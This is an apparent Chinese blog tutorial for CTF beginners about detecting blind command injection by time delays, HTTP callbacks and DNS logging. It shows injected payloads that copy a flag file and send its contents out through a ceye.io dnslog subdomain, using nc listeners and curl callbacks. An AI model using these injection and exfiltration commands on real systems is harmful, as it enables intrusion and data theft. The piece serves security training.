公网ip判断_CTF入门web篇18命令执行无回显的判断方法及dnslog相关例题

最新推荐文章于 2024-05-10 07:14:38 发布
最新推荐文章于 2024-05-10 07:14:38 发布
阅读量346 收藏 1
点赞数 1
文章标签: 公网ip判断
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39834780/article/details/111339540
版权
命令执行判断

命令执行可能会存在命令执行完没有回显,首先要判断命令是否有执行,可以通过三种方式来判断:延时、HTTP请求、DNS请求。

1、 延时

513ea019762e39029f14078886de5501.png

 无延时无回显

94233ae6cf0350f03b784c40686b1085.png有延时无回显

通过是否延时来判断该条命令是否有执行,有延时则代表命令有执行。(”sleep 3”表示延时3秒)

2、 HTTP请求

目标机通过向公网可通信的机子发起http请求,而这个公网可通信的机子是我们可控的,则当该公网机子收到http请求就代表命令有执行。 例:我们在公网机上可以通过”nc -lv 端口号”来监听该端口,当目标机”curl 公网机ip:端口号”的时候,公网机的该端口可以发现有http请求过来。(注意:ping命令不产生http请求)

9f72b30b73a4d1d482a809071461b842.png

公网机进行8000端口监听

04cacd88c577a058695d0dcd73cffa5a.png

 目标机向公网机的8000端口发起http请求

adb6423b3c49cd624c32fc3d62fe34d9.png

 公网机监听中的8000端口收到http请求

95ec2e6dd4f9670870e98f9fd5644a83.png

 将”curl 公网机ip:端口号”命令拼接到地址中进行命令执行

fb87b8c9ee54fd28c6f2d424d6141a0e.png

 公网机监听中的8000端口收到http请求说明命令执行成功

3、 DNS请求

如果请求的目标不是ip地址而是域名,那么域名最终还要转化成ip地址,就肯定要做一次域名解析请求。那么假设我有个可控的二级域名,那么它发出三级域名解析的时候,我这边是能够拿到它的域名解析请求的,这就相当于可以配合DNS请求进行命令执行的判断,这一般就被称为dnslog。(要通过dns请求即可通过ping命令,也能通过curl命令,只要对域名进行访问,让域名服务器进行域名解析就可实现)

例:大家可以去ceye.io注册个账号,注册完后会给一个域名,如果有域名解析请求会有记录。

我这边得到的域名是wzrtbq.ceye.io,如果我去访问1111111. wzrtbq.ceye.io,那么就会记录下来这个域名解析请求。

de1b96a53b7178155996d501d8f93d04.png

 访问1111111. wzrtbq.ceye.io

0e6598a87ff82c292232a19cba750e05.png

 域名解析请求被记录

8d63dd974f644ea90b94c50f9ae7c493.png

 将访问域名拼接到地址中

e76892d2200cc7ad94234c159013cd5b.png

 域名解析请求被记录

利用

1、直接写入或外部下载shell执行命令

例:通过命令执行直接得到文件内容 

5fc67c80bfe011210d990907deb2f28e.png

生成1.txt拷贝

0d764969c42b91a13cd4ceb2c473544e.png

 访问1.txt

将”=cp where_is_flag.php 1.txt”做为参数传递给ping,然后就执行了” cp where_is_flag.php 1.txt”这个命令,生成1.txt文件,在去访问1.txt,就能得到1.txt的内容(也就是where_is_flag.php的内容),最后找到flag

2、通过http请求/dns请求等方式带出数据

例:通过dnslog带出数据

注意:1、命令执行时要避免空格,空格会导致空格后面的命令执行不到;2、将读取的文件命令用``包含起来;3、拼接的域名有长度限制。

b1c91fcf99c9b7221cbf7429219da7d0.png

读取where_is_flag.php:`cat where_is_flag.php`

7990fd42992dc2ea50e473e2626a71ff.png

 替换读取文件中的空格:`cat where_is_flag.php|sed s/[[:space:]]//`

61166fea8c66755f0aac9c2f835a3f21.png

拼接域名:`cat where_is_flag.php|sed s/[[:space:]]//`.wzrtbq.ceye.io

734137bb610161009bab729342018c15.png

 利用dnslog

774d52df888789ae237695c88eac0546.png

 得到文件内容(即得到了flag文件地址)

4f9a0b1601f579c70674a5ed6ad85b7b.png

 获取flag文件内容

d949d6adec2fe06a50a2808ef0cc6a82.png

 获取到flag

975bf944b9c577bed2d274cddd013c7d.gif
weixin_39834780
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WEB安全】flask不出网回显方式
HBohan的博客
11-06 800
前言 研究这个问题主要是打比赛的时候遇到了,题目内容大概是这样的【查看资料】 # app.py from flask import Flask, request, session, render_template_string, url_for, redirect import pickle import io import sys import base64 import random import subprocess from config import notadmin app = Flask(_
CTF入门web篇18命令执行回显判断方法dnslog相关例题
anquanniu的博客
10-19 4493
命令执行判断 命令执行可能会存在命令执行完没有回显,首先要判断命令是否有执行,可以通过三种方式来判断:延时、HTTP请求、DNS请求。 1、 延时 无延时无回显 有延时无回显 通过是否延时来判断该条命令是否有执行,有延时则代表命令执行。(”sleep 3”表示延时3秒) 2、 HTTP请求 目标机通过向公网可通信的机子发起http请求,而这个公网可通信的机子是我们可控的,则当该公网机子收到h...
[CTF]命令执行回显利用
cosmoslin的博客
02-21 7506
背景 exec,shell_exec等函数可以执行命令但没有回显,我们需要寻找方法来得到命令执行后的结果 <?php highlight__file(__FILE__) shell_exec($_GET[cmd]); ?> 判断命令是否执行 延时 利用sleep函数 cmd=ls|sleep 5 HTTP请求 目标主机通过向VPS发起HTTP请求,VPS监听到请求则代表命令执行成功(注意:ping命令不产生http请求) VPS:nc -lvp 8888 目标主机:cm
CTF赛题分析之 Flask 目录穿越
程序员阿飘 的博客
01-09 1073
最近身边有萌新想打ctf,我作为一个曾经接触过一点点ctf的业余菜鸡,就索性做了一道Web题。这篇文章主要是面向想开始打ctf的萌新,所以很多地方可能都比较简单。如有错误之处,欢迎各位指正。Flask库是一个非常小型的Python Web开发框架。它有两个主要依赖:路由、调试和 Web 服务器网关接口(Web Server Gateway Interface,WSGI)子系统由 Werkzeug(werkzeug.pocoo.org/)提供;模板系统由Jinja2(jinja.pocoo.org/)提供。
CTF入门web篇18命令执行回显判断方法dnslog相关例题_ctf web题传参数后没有回显
2401_83620654的博客
05-10 722
例:我们在公网机上可以通过”nc -lv 端口号”来监听该端口,当目标机”curl 公网ip:端口号”的时候,公网机的该端口可以发现有http请求过来。目标机通过向公网可通信的机子发起http请求,而这个公网可通信的机子是我们可控的,则当该公网机子收到http请求就代表命令执行。2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?5、LVS、Nginx、HAproxy有什么区别?
CTF入门笔记之ping
qq_37410729的博客
11-02 4149
1.用命令行找flag文件 随便ping,然后跟ls 例如:1;ls 发现index.php文件 1;cat index.php 查看发现就是源网站。 那就向上找 1;ls …/ 继续向上找 直到1;ls …/…/…/ 发现flag 打开 1;cat …/…/…/flag 得到flag 2.绕过过滤打开文件 同样,先查看目录 payload:?ip=1;ls 发现两个文件,尝试直接打开index文件(虽然知道肯定不行) payload:?ip=1;cat index.php 果然不行
小白的CTF之路之DNSlog注入
glass_york的博客
01-07 1053
dnslog注入,sqlilabs第九关
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
ctf web解题 找flag夺旗赛概述、原理及应用.pdf
最新发布
05-13
以下是关于CTF Web解题、找flag夺旗赛的概述、原理及应用: 概述: CTF Web解题是CTF比赛中的一种题型,主要考察参赛者在Web安全方面的技术能力和漏洞挖掘能力。在比赛中,主办方会模拟一个真实的网络环境,并在其中...
CTF web安全经典例题讲解
10-22
本主题集中于CTF赛题中的Web安全部分,通过一系列经典例题来帮助初学者理解和掌握核心技能。以下是根据标题、描述和标签提炼出的相关知识点: 1. **SQL注入**:SQL注入是Web应用中常见的安全漏洞,攻击者通过输入...
dnslog盲打学习
..
02-27 3084
前言 在渗透或者ctf中,我们可能会遇到一些没有回显的漏洞,这个时候可以通过dnslog判断存不存在漏洞,并且得到漏洞执行的结果。 什么是dnslog dns是在我们输入一个域名如A.com时,会通过DNS把域名解析为ip,靠着dns解析到真正的ip地址127.0.0.1,这样子才能访问127.0.0.1服务器上的相应服务。 那么DNSlog是什么。DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名www.baidu.com等的访问信息,类似日志文件。 可以通过这篇文章好好
ctfshow学习记录-web入门(php特性127-136)
龟速更新的九某人
07-26 1328
ctfshow学习记录-web入门(php特性web127-136)
内网端口映射+dnslog
Js_123456789的博客
07-02 365
以前的DNSLOG部署在公网上也即自己的服务器上,产品依赖个人的环境不是很好。于是做了修改。 框架 细节 1)A域名的域名服务器指向B域名 ns0.B.com ns1.B.com 2)B域名的两个ns0 与 ns1 作A记录到公网IP上 3)公网通过VIP的方式将公网IP的53端口流量映射到内网服务器的任意端口(最好在一千端口以上,因为绑定1000以下端口需要root权限) ...
CTF-网络数据分析溯源(DNS服务器地址)
asd158923328的博客
08-24 2238
根据题意 进入环境,下载文件,用wireshark加载 wireshark筛选udp.port==53或者DNS 使用率最高的就是DNS服务器地址 验证ip获得key
CTF----Web真零基础入门
热门推荐
B_cecretary的博客
01-17 2万+
前置知识: TCP/IP体系结构(IP和端口): IP是什么:是计算机在互联网上的唯一标识(坐标,代号),用于在互联网中寻找计算机。 访问网站时:域名会通过DNS(解析服务)解析成IP。 所以,互通的前提条件就是双方都能找到对方的IP地址。 内网(局域网)IP公网(互联网)IP: 内网IP:路由以内的网络,可以连接互联网,但是互联网无法直接连接内网(需要端口映射) 如何判断自己的电脑是内网还是公网: --在本地电脑命令行输入jipconfig,ifconfig(Linux,macos)查看
ipify—A Simple IP Address API
漫漫人生路
05-22 4120
一个简单的IP地址API。 你可以直接访问:[https://api.ipify.org/][1] 查看你的IP 你是否需要通过程序获取对外的IP地址? 也许你正在配置新的云服务器,需要知道你的IP。 也许你在公司的防火墙后面,需要tunnel信息。 不管是什么原因:有一个获取可以获取公共IP地址的API是没坏处的。 你值得使用 ipify是因为: 你可以毫无限制地使用它(即使你每分钟做数百万...
ctf 监听端口_浅谈ctf中的无回显
06-10
CTF中的无回显指的是无法直接从应用程序输出或网络流量中获取结果的情况。在某些情况下,CTF比赛的参赛者需要在没有回显的情况下解决一些问题,例如监听某个端口。 在CTF中,监听端口通常意味着需要在某个特定的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值